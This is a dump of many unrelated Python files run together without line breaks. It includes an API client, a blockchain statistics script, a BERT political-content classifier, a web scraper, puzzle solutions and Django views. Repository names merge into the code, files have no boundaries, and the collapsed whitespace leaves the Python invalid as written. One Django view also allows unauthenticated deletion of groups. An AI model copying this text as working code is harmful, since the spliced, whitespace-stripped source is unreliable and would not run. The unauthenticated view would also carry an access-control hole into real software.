resp.apparent_encoding ) def relative_get(self, path, api_root=None, params=None, headers=None): """Perform HTTP GET at endpoint path relative to the API root.""" url = self._get_url(path, root=api_root) _log().info("Perfoming GET %s", url) resp = self.session.get(url, params=params, headers=headers) self._log_response(resp) if resp.status_code != 200: resp = None return resp def relative_post(self, path, api_root=None, params=None, data=None, headers=None): """Perform HTTP POST at endpoint path relative to the API root.""" url = self._get_url(path, root=api_root) _log().info("Perfoming POST %s", url) resp = self.session.post(url, params=params, data=data, headers=headers) self._log_response(resp) if resp.status_code != 200: resp = None return resp Config.DEFAULT_CONFIG = Config() class Authors(object): """Provide the authors portion of the API.""" def __init__(self, config=None): """Init the authors API with given config.""" self.config = config or Config.DEFAULT_CONFIG def _author_parse(self, author): if not author: return None else: stats = author.find('statistics') return { 'id': author.attrib['id'], 'lastupdate': author.attrib['lastupdate'], 'names': [n.text for n in author.find('names')], 'article_count': int(stats.find('narticles').text), 'citation_count': int(stats.find('ncitations').text), } def get_by_id(self, id): """Query author by scholarpedia ID: return a single author or None.""" resp = self.config.relative_get('authors/id/' + quote(id)) raw = resp.text if resp and resp.text else None if not raw: return None return self._author_parse(xmlparse(raw)) def get_by_name(self, name): """Query author by name: returns a list of authors.""" resp = self.config.relative_get('authors/name/' + quote(name)) raw = resp.text if resp and resp.text else None if not raw: return [] authors = xmlparse(raw) return [self._author_parse(author) for author in authors] def get_articles_by_id(self, id): """Return all articles published by the given author id.""" resp = self.config.relative_post( 'indexu.cgi', api_root='/cgi-bin/', headers={'Content-Type': 'text/plain;charset=UTF-8'}, data='', params={ 'func': 'arrecords', 'expr': id, 'ver': '4.1.0' } ) if len(resp.text) < 2: return [] # Can't possibly be valid json return resp.json() zzahti/skytools #! /usr/bin/env python import sys import re import pkgloader pkgloader.require('skytools', '3.0') import skytools.quoting kwmap = skytools.quoting._ident_kwmap fn = "/opt/src/pgsql/postgresql/src/include/parser/kwlist.h" if len(sys.argv) == 2: fn = sys.argv[1] rc = re.compile(r'PG_KEYWORD[(]"(.*)" , \s* \w+ , \s* (\w+) [)]', re.X) data = open(fn, 'r').read() full_map = {} cur_map = {} print "== new ==" for kw, cat in rc.findall(data): full_map[kw] = 1 if cat == 'UNRESERVED_KEYWORD': continue if cat == 'COL_NAME_KEYWORD': continue cur_map[kw] = 1 if kw not in kwmap: print kw, cat kwmap[kw] = 1 print "== obsolete ==" kws = kwmap.keys() kws.sort() for k in kws: if k not in full_map: print k, '(not in full_map)' elif k not in cur_map: print k, '(not in cur_map)' print "== full list ==" ln = "" for k in kws: ln += '"%s":1, ' % k if len(ln) > 70: print ln.strip() ln = "" print ln.strip() """-m level entry point""" from mand import main if __name__ == "__main__": main() jan25/code_sorted ''' https://leetcode.com/contest/weekly-contest-171/problems/minimum-flips-to-make-a-or-b-equal-to-c/ ''' class Solution: def minFlips(self, a: int, b: int, c: int) -> int: f = 0 while c > 0 or a > 0 or b > 0: cb = c % 2; c >>= 1 ab, bb = a % 2, b % 2 a >>= 1; b >>= 1 if cb == ab | bb: continue if cb == 0: f += ab + bb else: f += 1 return f goatops/handler.py import os import random def handle(req): """handle a request to the function Args: req (str): request body """ dirname = os.path.dirname(__file__) path = os.path.join(dirname, 'goatdata') goatdata = list(open(path, "r")) return random.choice(goatdata) from rest_framework import serializers from .models import Foto class FotoSerializer(serializers.HyperlinkedModelSerializer): class Meta: model = Foto fields = ( 'id', 'name', 'location', 'date', 'image', 'created', 'updated' ) 100-1000 import sys from datetime import datetime, timedelta from prettytable import PrettyTable import argparse from timeit import default_timer as timer import logging from beem.blockchain import Blockchain from beem.block import Block from beem import Hive, Blurt, Steem from beem.utils import parse_time from beem.nodelist import NodeList log = logging.getLogger(__name__) logging.basicConfig(level=logging.INFO) def parse_args(args=None): d = 'Show op type stats for either hive, blurt or steem.' parser = argparse.ArgumentParser(description=d) parser.add_argument('blockchain', type=str, nargs='?', default=sys.stdin, help='Blockchain (hive, blurt or steem)') return parser.parse_args(args) def main(args=None): args = parse_args(args) blockchain = args.blockchain nodelist = NodeList() nodelist.update_nodes(weights={"block": 1}) if blockchain == "hive" or blockchain is None: max_batch_size = 50 threading = False thread_num = 16 block_debug = 1000 nodes = nodelist.get_hive_nodes() blk_inst = Hive(node=nodes, num_retries=3, num_retries_call=3, timeout=30) elif blockchain == "blurt": max_batch_size = None threading = False thread_num = 8 block_debug = 20 nodes = ["https://rpc.blurt.buzz/", "https://api.blurt.blog", "https://rpc.blurtworld.com", "https://rpc.blurtworld.com"] blk_inst = Blurt(node=nodes, num_retries=3, num_retries_call=3, timeout=30) elif blockchain == "steem": max_batch_size = 50 threading = False thread_num = 16 block_debug = 1000 nodes = nodelist.get_steem_nodes() blk_inst = Steem(node=nodes, num_retries=3, num_retries_call=3, timeout=30) else: raise Exception("Wrong parameter, can be hive, blurt or steem") print(blk_inst) block_count = 0 total_ops = 0 total_trx = 0 duration_s = 60 * 60 * 1 blocksperday = int(duration_s / 3) blockchain = Blockchain(blockchain_instance=blk_inst, ) current_block_num = blockchain.get_current_block_num() last_block_id = current_block_num - blocksperday last_block = Block(last_block_id, blockchain_instance=blk_inst) stopTime = last_block.time() + timedelta(seconds=duration_s) start = timer() op_stats = {} for entry in blockchain.blocks(start=last_block_id, max_batch_size=max_batch_size, threading=threading, thread_num=thread_num): if "block" in entry: block_time = parse_time(entry["block"]["timestamp"]) else: block_time = entry["timestamp"] if block_time > stopTime: break block_count += 1 if "block" in entry: trxs = entry["block"]["transactions"] else: trxs = entry["transactions"] for tx in trxs: total_trx += 1 for op in tx["operations"]: if "_operation" in op["type"]: op_type = op["type"][:-10] else: op_type = op["type"] if op_type in op_stats: op_stats[op_type] += 1 else: op_stats[op_type] = 1 total_ops += 1 ops_per_day = total_ops / block_count * blocksperday if block_count % (block_debug) == 0: print("%d blocks remaining... estimated ops per day: %.1f" % (blocksperday - block_count, ops_per_day)) duration = timer() - start t = PrettyTable(["Type", "Count", "percentage"]) t.align = "l" op_list = [] for o in op_stats: op_list.append({"type": o, "n": op_stats[o], "perc": op_stats[o] / total_ops * 100}) op_list_sorted = sorted(op_list, key=lambda x: x['n'], reverse=True) for op in op_list_sorted: t.add_row([op["type"], op["n"], "%.2f %%" % op["perc"]]) print(t) if __name__ == '__main__': sys.exit(main()) actor/PlantRegistry.py from actor import SimplePlantActor from plant.exception import PlantNotFoundException from plantstorage import PlantStorage plants = {} storage = PlantStorage.PlantStorage() storage.initialize_db() for plant in storage.get_all_plants(): plants[plant.uid] = SimplePlantActor.SimplePlantActor.start( plant.uid, plant.initial_setpoint, plant.fluctuationInPercentage, plant.rampInSeconds) def find_active_plant(uid): try: return plants[uid] except KeyError: raise PlantNotFoundException.PlantNotFoundException("Plant not found in running plants", uid) def add_new_plant(name, capacity, fluctuation, ramp): uid = storage.persist(name, capacity, fluctuation, ramp) plants[uid] = SimplePlantActor.SimplePlantActor.start(uid, capacity, fluctuation, ramp) return uid def delete_plant(uid): storage.destroy(uid) find_active_plant(uid).stop() del (plants[uid])#!/usr/bin/env python # # Generated Tue Jun 29 16:14:16 2004 by generateDS.py. # from __future__ import print_function import sys from xml.dom import minidom from xml.sax import handler, make_parser import xmlbehavior as supermod class xml_behaviorSub(supermod.xml_behavior): def __init__(self, base_impl_url='', behaviors=None): supermod.xml_behavior.__init__(self, base_impl_url, behaviors) def get_class_dictionary(self): return self.classDictionary # # Make a dictionary whose keys are class names and whose # values are the behaviors for that class. def make_class_dictionary(self, cleanupNameFunc): self.classDictionary = {} self.behaviors.make_class_dictionary(self.classDictionary, cleanupNameFunc) supermod.xml_behavior.subclass = xml_behaviorSub # end class xml_behaviorSub class behaviorsSub(supermod.behaviors): def __init__(self, behavior=None): supermod.behaviors.__init__(self, behavior) def make_class_dictionary(self, classDictionary, cleanupNameFunc): for behavior in self.behavior: behavior.make_class_dictionary(classDictionary, cleanupNameFunc) supermod.behaviors.subclass = behaviorsSub # end class behaviorsSub class behaviorSub(supermod.behavior): def __init__(self, klass='', name='', return_type='', args=None, impl_url=''): supermod.behavior.__init__(self, klass, name, return_type, args, impl_url) def make_class_dictionary(self, classDictionary, cleanupNameFunc): className = cleanupNameFunc(self.klass) if className not in classDictionary: classDictionary[className] = [] classDictionary[className].append(self) supermod.behavior.subclass = behaviorSub # end class behaviorSub class argsSub(supermod.args): def __init__(self, arg=None): supermod.args.__init__(self, arg) supermod.args.subclass = argsSub # end class argsSub class argSub(supermod.arg): def __init__(self, name='', data_type=''): supermod.arg.__init__(self, name, data_type) supermod.arg.subclass = argSub # end class argSub class ancillariesSub(supermod.ancillaries): def __init__(self, ancillary=None): supermod.ancillaries.__init__(self, ancillary) # # XMLBehaviors # supermod.ancillaries.subclass = ancillariesSub # end class ancillariesSub class ancillarySub(supermod.ancillary): def __init__(self, klass='', role='', return_type='', name='', args=None, impl_url=''): supermod.ancillary.__init__(self, klass, role, return_type, name, args, impl_url) supermod.ancillary.subclass = ancillarySub # end class ancillarySub def saxParse(inFileName): parser = make_parser() documentHandler = supermod.SaxXml_behaviorHandler() parser.setDocumentHandler(documentHandler) parser.parse('file:%s' % inFileName) rootObj = documentHandler.getRoot() #sys.stdout.write('\n') #rootObj.export(sys.stdout, 0) return rootObj def saxParseString(inString): parser = make_parser() documentHandler = supermod.SaxContentHandler() parser.setDocumentHandler(documentHandler) parser.feed(inString) parser.close() rootObj = documentHandler.getRoot() #sys.stdout.write('\n') #rootObj.export(sys.stdout, 0) return rootObj def parse(inFilename): doc = minidom.parse(inFilename) rootNode = doc.childNodes[0] rootObj = supermod.xml_behavior.factory() rootObj.build(rootNode) #sys.stdout.write('\n') #rootObj.export(sys.stdout, 0) doc = None return rootObj def parseString(inString): doc = minidom.parseString(inString) rootNode = doc.childNodes[0] rootObj = supermod.xml_behavior.factory() rootObj.build(rootNode) doc = None #sys.stdout.write('\n') #rootObj.export(sys.stdout, 0) return rootObj def parseLiteral(inFilename): doc = minidom.parse(inFilename) rootNode = doc.childNodes[0] rootObj = supermod.xml_behavior.factory() rootObj.build(rootNode) #sys.stdout.write('from xmlbehavior_sub import *\n\n') #sys.stdout.write('rootObj = xml_behavior(\n') #rootObj.exportLiteral(sys.stdout, 0) #sys.stdout.write(')\n') doc = None return rootObj USAGE_TEXT = """ Usage: python ???.py """ def usage(): print(USAGE_TEXT) sys.exit(-1) def main(): args = sys.argv[1:] if len(args) != 1: usage() infilename = args[0] root = parse(infilename) sys.stdout.write('\n') root.export(sys.stdout, 0) if __name__ == '__main__': main() #import pdb #pdb.run('main()') from lxml import etree import os import xlsxwriter #获取文件路径 def get_path(pamename): file_name = [] for root, dirs, files in os.walk(pamename): for name in files: file_name.append(os.path.join(root, name)) return file_name # 提取信息 def info_extract(drug_path): drug = [] html = etree.parse(drug_path, etree.HTMLParser()) info = html.xpath('//div[@class="info-content"]/div[@class="info-left"]')[0] # /html/body/div[4]/div[1]/div[3]/div[1]/a info_text = info.xpath('//div/div[@class="more-infomation"]/p') for t in info_text: t = t.xpath('string(.)') t = t.replace('\t', '') t = t.replace('\r', '') t = t.replace('\r', '') t = t.replace(' ', '') drug.append(t) # info_title = info.xpath('//div/div[@class="title"]/a/text()') return drug if __name__ == '__main__': path = get_path(r'D:\python\医脉通\医脉通_full.1\西药\代谢及内分泌系统药物(完)') # 手动改 fw = open("test_3.txt", 'w+', encoding='utf-8') for i in path: drug_info = info_extract(i) for m in drug_info: fw.write('\n' + m) # 把字典转化为str fw.close()wordsForDelete = ["bought","what","how","when","where","why","we","we've","i've","buck","bucks","dollars","dollar","home","office","customer","price","budget","fix","i","my","happy","day","overall","days","got","get","delivered","deliver","she","you","u","he","am","mine"] #print(len(word)) # encoding=utf-8 import os os.environ["CUDA_VISIBLE_DEVICES"] = "2" """ 基于命令行的在线预测方法 @Author: Macan () """ import re import tensorflow as tf import numpy as np import codecs import pickle import os from datetime import datetime from flask import Flask,request app = Flask(__name__) from bert_base.bert import tokenization, modeling from bert_base.train.models import create_classification_model ## some parameters DO_LOWER_CASE = False MAX_SEQ_LENGTH = 256 model_dir = '/data/leo/Projects/bert/outputs/Cla_wende_2_v1' bert_dir = '/data/leo/Projects/bert/models/chinese_L-12_H-768_A-12' is_training=False use_one_hot_embeddings=False batch_size=1 gpu_config = tf.ConfigProto() gpu_config.gpu_options.allow_growth = True sess=tf.Session(config=gpu_config) model=None global graph input_ids_p, input_mask_p, label_ids_p, segment_ids_p = None, None, None, None print('checkpoint path:{}'.format(os.path.join(model_dir, "checkpoint"))) if not os.path.exists(os.path.join(model_dir, "checkpoint")): raise Exception("failed to get checkpoint. going to return ") label2id = {"0":0, "1":1} id2label = {value: key for key, value in label2id.items()} label_list = label2id.keys() num_labels = len(label_list) graph = tf.get_default_graph() with graph.as_default(): print("going to restore checkpoint") #sess.run(tf.global_variables_initializer()) input_ids_p = tf.placeholder(tf.int32, [batch_size, MAX_SEQ_LENGTH], name="input_ids") input_mask_p = tf.placeholder(tf.int32, [batch_size, MAX_SEQ_LENGTH], name="input_mask") bert_config = modeling.BertConfig.from_json_file(os.path.join(bert_dir, 'bert_config.json')) loss, per_example_loss, logits, probabilities = create_classification_model(bert_config=bert_config, is_training=False, input_ids=input_ids_p, input_mask=input_mask_p, segment_ids=None, labels=None, num_labels=num_labels) # pred_ids = tf.argmax(probabilities, axis=-1, output_type=tf.int32, name='pred_ids') # pred_ids = tf.identity(pred_ids, 'pred_ids') # probabilities = tf.identity(probabilities, 'pred_prob') saver = tf.train.Saver() # (total_loss, logits, trans, pred_ids) = create_model( # bert_config=bert_config, is_training=False, input_ids=input_ids_p, input_mask=input_mask_p, segment_ids=None, # labels=None, num_labels=num_labels, use_one_hot_embeddings=False, dropout_rate=1.0) saver = tf.train.Saver() print("model_dir: ",model_dir) saver.restore(sess, tf.train.latest_checkpoint(model_dir)) tokenizer = tokenization.FullTokenizer( vocab_file=os.path.join(bert_dir, 'vocab.txt'), do_lower_case=DO_LOWER_CASE) class InputFeatures(object): """A single set of features of data.""" def __init__(self, input_ids, input_mask, segment_ids, ): self.input_ids = input_ids self.input_mask = input_mask self.segment_ids = segment_ids # self.label_ids = label_ids # self.label_mask = label_mask def convert_single_example(ex_index, example, label_list, max_seq_length, tokenizer, mode): """ 将一个样本进行分析,然后将字转化为id, 标签转化为id,然后结构化到InputFeatures对象中 :param ex_index: index :param example: 一个样本 :param label_list: 标签列表 :param max_seq_length: :param tokenizer: :param mode: :return: """ label_map = {} # 1表示从1开始对label进行index化 for (i, label) in enumerate(label_list, 1): label_map[label] = i # 保存label->index 的map if not os.path.exists(os.path.join(model_dir, 'label2id.pkl')): with codecs.open(os.path.join(model_dir, 'label2id.pkl'), 'wb') as w: pickle.dump(label_map, w) tokens = example # tokens = tokenizer.tokenize(example.text) # 序列截断 if len(tokens) >= max_seq_length - 1: tokens = tokens[0:(max_seq_length - 2)] # -2 的原因是因为序列需要加一个句首和句尾标志 ntokens = [] segment_ids = [] # label_ids = [] ntokens.append("[CLS]") # 句子开始设置CLS 标志 segment_ids.append(0) # append("O") or append("[CLS]") not sure! # label_ids.append(label_map["[CLS]"]) # O OR CLS 没有任何影响,不过我觉得O 会减少标签个数,不过拒收和句尾使用不同的标志来标注,使用LCS 也没毛病 for i, token in enumerate(tokens): ntokens.append(token) segment_ids.append(0) # label_ids.append(0) ntokens.append("[SEP]") # 句尾添加[SEP] 标志 segment_ids.append(0) # append("O") or append("[SEP]") not sure! # label_ids.append(label_map["[SEP]"]) input_ids = tokenizer.convert_tokens_to_ids(ntokens) # 将序列中的字(ntokens)转化为ID形式 input_mask = [1] * len(input_ids) # padding, 使用 while len(input_ids) < max_seq_length: input_ids.append(0) input_mask.append(0) segment_ids.append(0) # we don't concerned about it! # label_ids.append(0) ntokens.append("**NULL**") # label_mask.append(0) # print(len(input_ids)) assert len(input_ids) == max_seq_length assert len(input_mask) == max_seq_length assert len(segment_ids) == max_seq_length # assert len(label_ids) == max_seq_length # assert len(label_mask) == max_seq_length # 结构化为一个类 feature = InputFeatures( input_ids=input_ids, input_mask=input_mask, segment_ids=segment_ids, # label_ids=label_ids, # label_mask = label_mask ) return feature def predict(text): """ do online prediction. each time make prediction for one instance. you can change to a batch if you want. :param line: a list. element is: [dummy_label,text_a,text_b] :return: """ def convert(line): feature = convert_single_example(0, line, label_list, MAX_SEQ_LENGTH, tokenizer, 'p') input_ids = np.reshape([feature.input_ids],(batch_size, MAX_SEQ_LENGTH)) input_mask = np.reshape([feature.input_mask],(batch_size, MAX_SEQ_LENGTH)) segment_ids = np.reshape([feature.segment_ids],(batch_size, MAX_SEQ_LENGTH)) # label_ids =np.reshape([feature.label_ids],(batch_size, MAX_SEQ_LENGTH)) return input_ids, input_mask, segment_ids global graph with graph.as_default(): # print(id2label) sentence = text start = datetime.now() sentence = tokenizer.tokenize(sentence) # print('tokenized sentence:{}'.format(sentence)) input_ids, input_mask, segment_ids = convert(sentence) feed_dict = {input_ids_p: input_ids, input_mask_p: input_mask} # run session get current feed_dict result prob = sess.run([probabilities], feed_dict) # print("prob: ", prob) result = prob[0].tolist()[0] # print(result) if result[0] < result[1]: return '1',result[1] else: return '0',result[0] # exit() # pred_label_result = convert_id_to_label(pred_ids_result, id2label) # print(pred_label_result) # #todo: 组合策略 # result = strage_combined_link_org_loc(sentence, pred_label_result[0]) # print("研究问题:", result) # print('time used: {} sec'.format((datetime.now() - start).total_seconds())) # return result @app.route('/Question_Word', methods=['GET']) def Question_Word(): if not request.args.get("data"): pass text = request.args.get("data") print(text) words = predict(text) print(words) return {'results':words} def clean(text): text = re.sub(r"(回复)?(//)?\s*@\S*?\s*(:| |$)", " ", text) # 去除正文中的@和回复/转发中的用户名 text = re.sub(r"\[\S+\]", "", text) # 去除表情符号 text = re.sub(r"#\S+#", "", text) # 去除话题内容 text = re.sub(r"【\S+】", "", text) # 去除标题 URL_REGEX = re.compile( r'(?i)\b((?:https?://|www\d{0,3}[.]|[a-z0-9.\-]+[.][a-z]{2,4}/)(?:[^\s()<>]+|\(([^\s()<>]+|(\([^\s()<>]+\)))*\))+(?:\(([^\s()<>]+|(\([^\s()<>]+\)))*\)|[^\s`!()\[\]{};:\'".,<>?«»“”‘’]))', re.IGNORECASE) text = re.sub(URL_REGEX, "", text) # 去除网址 text = text.replace("转发微博", "") # 去除无意义的词语 text = text.replace("本报讯", "") text = re.sub(r"\s+", " ", text) # 合并正文中过多的空格 return text.strip() if __name__ == "__main__": # app.run('0.0.0.0', port=7200,debug=False) # while True: # text = input() # predict(text) import pandas as pd df = pd.read_excel('/data/leo/Work/Wende/弹幕审核测试文案.xlsx') print(df.head()) text = df['弹幕审核测试文案'].tolist() new_text = [] for t in text: new_text.append(clean(t)) df['涉政模型预测结果_v3'] = '' df['涉政模型预测得分_v3'] = '' from tqdm import tqdm i = 0 with open('/data/leo/Work/Wende/test_2_v1.txt','w',encoding='utf-8') as f: for t in tqdm(new_text): c = '' c,prob = predict(t) f.write(c + '\t' + str(prob) + '\n') i += 1 df.loc[i, '涉政模型预测结果'] = c df.loc[i, '涉政模型预测得分'] = str(prob) df.to_excel('/data/leo/Work/Wende/弹幕审核测试文案_2_v1.xlsx') from pathlib import Path import dask.array as da from ..interface import pool, visualize_pools def test_visualize(tmp_path: Path): # Just test that it doesn't fail with pool("A"): a = da.random.random((10, 10)) with pool("B"): b = da.random.random(10) run_in_a = (a - 1).sum() run_in_b = b - a.mean() visualize_pools(run_in_a, filename=tmp_path / "a.svg") assert (tmp_path / "a.svg").exists() visualize_pools(run_in_a, run_in_b, filename=tmp_path / "both.svg") assert (tmp_path / "both.svg").exists() visualize_pools(run_in_a, run_in_b.dask, filename=tmp_path / "both-hlg.svg") assert (tmp_path / "both-hlg.svg").exists() research/atpe_research_2/benchmark.py from hypermax.optimizer import ATPEOptimizer from hypermax.optimizer import TPEOptimizer from hypermax.optimizer import RandomSearchOptimizer import hpolib.benchmarks.synthetic_functions as hpobench from hpolib.benchmarks.ml import svm_benchmark, logistic_regression import numpy as np from pprint import pprint atpeOptimizer = ATPEOptimizer() tpeOptimizer = TPEOptimizer() randomOptimizer = RandomSearchOptimizer() algorithms = { "ATPE": atpeOptimizer, "TPE": tpeOptimizer, "Random": randomOptimizer } # Run Scipy.minimize on artificial testfunctions h3 = hpobench.Hartmann3() h6 = hpobench.Hartmann6() b = hpobench.Branin() bo = hpobench.Bohachevsky() cb = hpobench.Camelback() fo = hpobench.Forrester() gp = hpobench.GoldsteinPrice() le = hpobench.Levy() rb = hpobench.Rosenbrock() logreg = svm_benchmark.SvmOnMnist() for f in [logreg]: info = f.get_meta_information() print("=" * 50) print(info['name']) space = { "type": "object", "properties": {} } for boundIndex, bound in enumerate(info['bounds']): space['properties'][str(boundIndex)] = { "type": "number", "scaling": "linear", "mode": "uniform", "min": bound[0], "max": bound[1] } increment = 0 for name, optimizer in algorithms.items(): print("Optimizer", name) losses = [] for round in range(1): best = None history = [] for trial in range(100): params = optimizer.recommendNextParameters(space, history) evalParams = [params[str(boundIndex)] for boundIndex in range(len(space['properties']))] val = f(evalParams) val += increment print(val) params['loss'] = val params['status'] = 'ok' history.append(params) if best is None or val < best['loss']: best = params print(round, best['loss']) losses.append(best['loss']) averageLoss = np.mean(losses) averageLoss -= increment print("Average loss: ", averageLoss) import collections FootballTeam = collections.namedtuple('FootballTeam', ['name', 'country']) # Class definition with special methods implemented class Teams: countries = ['Germany', 'France', 'Spain'] bundesliga_teams = ['RB Leipzig', 'Bayern Munich', 'Borussia Dortmund'] def __init__(self, country_name): # List comprehension with a filter on country name self._teams = [FootballTeam(name, country) for name in self.bundesliga_teams for country in self.countries if country == country_name] def __len__(self): return len(self._teams) def __getitem__(self, position): return self._teams[position] def getAll(self): return self._teams teams = Teams("Germany") print(len(teams)) print(teams[0]) print(teams.getAll())2020/05/solution.py1-10 def parse_data(): with open('2020/05/input.txt') as f: data = f.read() return data.splitlines() def get_ids(data): to_binary = str.maketrans('FBLR', '0101') return [int(code.translate(to_binary), base=2) for code in data] def part_one(data): return max(get_ids(data)) def part_two(data): ids = get_ids(data) min_id = min(ids) max_id = max(ids) seats_available = (max_id * (max_id + 1) - min_id * (min_id - 1)) // 2 seats_occupied = sum(ids) return seats_available - seats_occupied def main(): data = parse_data() print(f'Day 05 Part 01: {part_one(data)}') print(f'Day 05 Part 02: {part_two(data)}') albe-rosado/xuexiao-xitong0 """migration from sqlite Revision ID: 56f1be2cd3c Revises: 2 Create Date: 2017-01-22 14:27:46.568469 """ # revision identifiers, used by Alembic. revision = '56f1be2cd3c' down_revision = '2' from alembic import op import sqlalchemy as sa def upgrade(): ### commands auto generated by Alembic - please adjust! ### pass ### end Alembic commands ### def downgrade(): ### commands auto generated by Alembic - please adjust! ### pass ### end Alembic commands ### # printl print('Hickory Disckry Dock! The mouse ran up the clock') print("Hickory Disckry Dock! The mouse ran up the clock") #print demo print('The capybars is the worlds largest rodent') #print ' / " print("It's beautiful day in the neighborhood") print('It\'s beautiful day in the neighborhood') #print multi line print('Hickory Disckry Dock! \nThe mouse ran up the clock') #print triple quotes and tab print("""Hickory Disckry Dock! The mouse ran up the clock""") print("""Hickory Disckry Dock! The mouse ran up the clock""") print("""Hickory Disckry Dock! \tThe mouse ran up the clock""") #print use both single and double print('here is a double quote "' + " here is a single quote '") print("or you can hust do this \" does that work") print("can I just print \ on the screen? ") print("But what if I want \\news") from django.template.loader import render_to_string from django.contrib import messages from django.conf import settings from django.template import TemplateDoesNotExist from django.core.mail import EmailMultiAlternatives, EmailMessage from django.contrib.sites.models import Site try: from django.utils.encoding import force_text except ImportError: from django.utils.encoding import force_unicode as force_text from .app_settings import app_settings from .utils import import_attribute from .signals import user_signed_up # Code credits here to django-allauth class BaseInvitationsAdapter(object): def stash_verified_email(self, request, email): request.session['account_verified_email'] = email def unstash_verified_email(self, request): ret = request.session.get('account_verified_email') request.session['account_verified_email'] = None return ret def format_email_subject(self, subject): # prefix = app_settings.EMAIL_SUBJECT_PREFIX # if prefix is None: # site = Site.objects.get_current() # prefix = "[{name}] ".format(name=site.name) return force_text(subject) def render_mail(self, template_prefix, email, context): """ Renders an e-mail to `email`. `template_prefix` identifies the e-mail that is to be sent, e.g. "account/email/email_confirmation" """ subject = render_to_string('{0}_subject.txt'.format(template_prefix), context) # remove superfluous line breaks subject = " ".join(subject.splitlines()).strip() subject = self.format_email_subject(subject) bodies = {} for ext in ['html', 'txt']: try: template_name = '{0}_message.{1}'.format(template_prefix, ext) bodies[ext] = render_to_string(template_name, context).strip() except TemplateDoesNotExist: if ext == 'txt' and not bodies: # We need at least one body raise if 'txt' in bodies: msg = EmailMultiAlternatives(subject, bodies['txt'], settings.DEFAULT_FROM_EMAIL, [email]) if 'html' in bodies: msg.attach_alternative(bodies['html'], 'text/html') else: msg = EmailMessage(subject, bodies['html'], settings.DEFAULT_FROM_EMAIL, [email]) msg.content_subtype = 'html' # Main content is now text/html return msg def send_mail(self, template_prefix, email, context): msg = self.render_mail(template_prefix, email, context) msg.send() def is_open_for_signup(self, request): if hasattr(request, 'session') and request.session.get( 'account_verified_email'): return True elif app_settings.INVITATION_ONLY is True: # Site is ONLY open for invites return False else: # Site is open to signup return True def clean_email(self, email): """ Validates an email value. You can hook into this if you want to (dynamically) restrict what email addresses can be chosen. """ return email def add_message(self, request, level, message_template, message_context=None, extra_tags=''): """ Wrapper of `django.contrib.messages.add_message`, that reads the message text from a template. """ if 'django.contrib.messages' in settings.INSTALLED_APPS: try: if message_context is None: message_context = {} message = render_to_string(message_template, message_context).strip() if message: messages.add_message(request, level, message, extra_tags=extra_tags) except TemplateDoesNotExist: pass def get_user_signed_up_signal(self): return user_signed_up def get_invitations_adapter(): # Compatibility with legacy allauth only version. LEGACY_ALLAUTH = hasattr(settings, 'ACCOUNT_ADAPTER') and \ settings.ACCOUNT_ADAPTER == 'web.models.InvitationsAdapter' if LEGACY_ALLAUTH: # defer to allauth print("FAIL") else: # load an adapter from elsewhere return import_attribute(app_settings.ADAPTER)()sorting_algorithms/mergesort.py1-10 import time def merge(data,start,mid,end,drawData,timeTick): p=start q=mid+1 tempArray=[] for i in range(start,end+1): if p>mid: tempArray.append(data[q]) q+=1 elif q>end: tempArray.append(data[p]) p+=1 elif data[p] < data[q]: tempArray.append(data[p]) p+=1 else: tempArray.append(data[q]) q+=1 for p in range(len(tempArray)): data[start]=tempArray[p] start +=1 def mergeSort(data,drawData,timeTick,start,end): if start < end: mid=int((start + end)/2) mergeSort(data,drawData,timeTick,start,mid) mergeSort(data,drawData,timeTick,mid+1,end) merge(data,start,mid,end,drawData,timeTick) drawData(data, ['green' if x >= start and x < mid else 'yellow' if x==mid else 'blue' if x>mid and x<=end else 'red' for x in range(len(data))]) time.sleep(timeTick) drawData(data,['red' for x in range(len(data))])import itertools from django.contrib.auth.models import User from rest_framework.permissions import IsAuthenticated from rest_framework.authentication import TokenAuthentication from rest_framework.views import APIView from rest_framework.views import Response from rest_framework.views import status from rest_framework import viewsets from corsheaders.signals import check_request_enabled from hacks.models import Pilot, Event, EventParticipation, WorkGroups # , Facilitator from .serializers import DetailsPilotSerializer, DetailsEventSerializer, PaticipationEventStatusSerializer, \ GroupSerializer # , FacilitatorSerializer from tools.models import Hackproces, Projects, ProjectFiles from django.contrib.auth import get_user_model from rest_framework.generics import CreateAPIView from django.contrib.auth.models import User from django.core.mail import send_mail from django.conf import settings from django.utils import timezone from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger from datetime import datetime class PilotList(APIView): def get(self, request): pilots = Pilot.objects.all() serializer = DetailsPilotSerializer(pilots, many=True) return Response(serializer.data) class TTQ(APIView): def __init__(self): print("in init") def delete(self, request, Gid): group = WorkGroups.objects.get(id=Gid) group.users.clear() group.delete() return Response(status=status.HTTP_204_NO_CONTENT) def post(self, request, Gid): group = WorkGroups.objects.get(id=Gid) group.name = request.data['name'] group.save() return Response('Group updated !') def get(self, request, Gid): group = WorkGroups.objects.get(id=Gid) return Response(group.name) class GroupsList(APIView): authentication_classes = (TokenAuthentication,) permission_classes = (IsAuthenticated,) def get(self, request): groups = WorkGroups.objects.all() serializer = GroupSerializer(groups, many=True) return Response(serializer.data) def post(self, request): fonction = request.data['fonc'] response = any if fonction == '1': response = self.fetch_groups_of_event(request.data) elif fonction == '2': response = self.assign_to_group(request.data) elif fonction == '3': response = self.unassign_to_group(request.data) elif fonction == '4': response = self.group_new(request.data) elif fonction == '5': response = self.validate_group(request.data) elif fonction == '6': response = self.fetch_user_group(request) elif fonction == '7': response = self.fetch_allgroups_of_event(request.data) elif fonction == '8': response = self.verify_group_event(request) return Response(response) def fetch_groups_of_event(self, request): goups = WorkGroups.objects.filter(event_id=request['event']) serializer = GroupSerializer(goups, many=True) return serializer.data def assign_to_group(self, request): record = WorkGroups.objects.get(id=request['group']) record_user = User.objects.get(id=request['user']) msg = 'Should be done !' if (record.users.add(record_user)): msg = 'Error' return msg def unassign_to_group(self, request): record = User.objects.get(id=request['user']) groups = WorkGroups.objects.get(users__id__contains=record.id, event_id=request['event']) groups.users.remove(record) msg = 'Should be done !' return msg def group_new(self, request): event = Event.objects.get(id=request['event_id']) newGroup = WorkGroups(name=request['name'], event=event, status=0) newGroup.save() return 'New group created !' def validate_group(self, request): group = WorkGroups.objects.get(id=request['group']) group.status = 1 group.save() return 'Group validated' def fetch_user_group(self, request): user = User.objects.get(id=request.user.id) event = Event.objects.get(id=request.data['event']) record = WorkGroups.objects.get(event=event, users=user) serlizer = GroupSerializer(record) return serlizer.data def fetch_allgroups_of_event(self, request): goups = WorkGroups.objects.filter(event_id=request['event']) serializer = GroupSerializer(goups, many=True) return serializer.data def verify_group_event(self, request): try: group = WorkGroups.objects.get(users=request.user.id, event=request.data['event']) return group.status except WorkGroups.DoesNotExist: return 